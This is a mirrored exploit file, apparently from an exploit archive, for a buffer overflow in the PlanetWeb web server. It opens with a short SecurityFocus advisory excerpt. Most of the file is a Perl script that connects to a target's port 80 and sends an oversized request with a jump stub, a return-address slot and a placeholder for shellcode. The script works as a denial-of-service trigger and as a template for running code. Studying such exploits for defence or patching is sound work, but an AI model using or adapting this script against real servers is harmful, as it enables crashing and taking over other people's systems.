31 lines
No EOL
1.4 KiB
Perl
Executable file
31 lines
No EOL
1.4 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/5988/info
|
||
|
||
PlanetWeb is a commercially available web server integrated with dynamic DNS services. It is distributed by PlanetDNS, and available for Microsoft Operating Systems.
|
||
|
||
PlanetWeb does not properly handle long requests. Due to insufficient bounds checking, a long request sent to PlanetWeb may result in a buffer overflow. This could result in a denial of service, and has been reported as being exploitable to execute arbitrary code.
|
||
|
||
#!/usr/bin/perl -w
|
||
#tool bop.pl
|
||
# buffer overflow tested against plaetweb v1.14
|
||
# humm..this exploit is not for lamers...
|
||
# Greetz: marocit and #crack.fr (specialemet christal...plus tu p<>dales moins fort, moins tu #avances plus vite..)
|
||
#
|
||
|
||
use IO::Socket;
|
||
if ($#ARGV<0)
|
||
{
|
||
print "\n write the target IP!! \n\n";
|
||
exit;
|
||
}
|
||
|
||
$shellcode =
|
||
("YOURFAVORITSHELLCODEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");#add your favorit shellcode
|
||
$buffer = "A"x6444;
|
||
$ebx = "\x90\xEB\x08\x90";# you have the chance because ebx = eip - 4 bytes jmp short 0xff x0d3
|
||
$ret = "\x43\x43\x43\x43";# insert your ret address with (jmp ebx or call ebx)
|
||
$minibuf ="\x90\x90\x90\x90";# will be jumped by EB08
|
||
$connect = IO::Socket::INET ->new (Proto=>"tcp",
|
||
PeerAddr=> "$ARGV[0]",
|
||
PeerPort=>"80"); unless ($connect) { die "cant connect $ARGV [0]" }
|
||
print $connect "$buffer$ebx$ret$minibuf$shellcode";
|
||
print "\nsending exploit......\n\n"; |